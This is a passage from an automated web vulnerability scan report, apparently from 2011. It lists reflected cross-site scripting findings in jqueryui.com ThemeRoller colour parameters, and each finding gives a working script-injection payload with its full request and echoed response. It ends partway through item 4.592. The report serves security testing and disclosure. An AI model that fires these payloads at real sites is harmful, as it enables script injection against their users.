X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:03 GMT
Connection: close
Content-Length: 19890
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=jp.imlive.com&ul=/?d2e62'-alert(1)-'e87ff225301=1&qs=d2e62'-alert(1)-'e87ff225301=1&qs=d2e62'-alert(1)-'e87ff225301=1&iy=dallas&id=44&iu=1&vd=7a755e33-be6e-4c0d-be05-9c18484cccd6';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.583. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f240"><script>alert(1)</script>f1fb6a82e6a was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff6f240"><script>alert(1)</script>f1fb6a82e6a&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:04:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff6f240"><script>alert(1)</script>f1fb6a82e6a&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&bord
...[SNIP]...

4.584. http://jqueryui.com/themeroller/ [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d42b3"><script>alert(1)</script>68731049f78 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffffd42b3"><script>alert(1)</script>68731049f78&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffffd42b3"><script>alert(1)</script>68731049f78&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

4.585. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1bba"><script>alert(1)</script>d567ad6aac5 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6c1bba"><script>alert(1)</script>d567ad6aac5&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:02:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6c1bba"><script>alert(1)</script>d567ad6aac5&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

4.586. http://jqueryui.com/themeroller/ [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ff0c"><script>alert(1)</script>09e48b8ba84 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec9ff0c"><script>alert(1)</script>09e48b8ba84&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
2121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec9ff0c"><script>alert(1)</script>09e48b8ba84&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

4.587. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a89eb"><script>alert(1)</script>243270c1e17 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccca89eb"><script>alert(1)</script>243270c1e17&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccca89eb"><script>alert(1)</script>243270c1e17&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

4.588. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 647b8"><script>alert(1)</script>eb0371bb5c was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee647b8"><script>alert(1)</script>eb0371bb5c&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
9999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee647b8"><script>alert(1)</script>eb0371bb5c&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&b
...[SNIP]...

4.589. http://jqueryui.com/themeroller/ [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66799"><script>alert(1)</script>b366a3b969c was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada66799"><script>alert(1)</script>b366a3b969c&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:03:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada66799"><script>alert(1)</script>b366a3b969c&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=
...[SNIP]...

4.590. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca091"><script>alert(1)</script>3b444860e28 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaaca091"><script>alert(1)</script>3b444860e28&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:06:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
efa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaaca091"><script>alert(1)</script>3b444860e28&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

4.591. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 146db"><script>alert(1)</script>2fe2f03b949 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa146db"><script>alert(1)</script>2fe2f03b949&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:06:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa146db"><script>alert(1)</script>2fe2f03b949&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.592. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

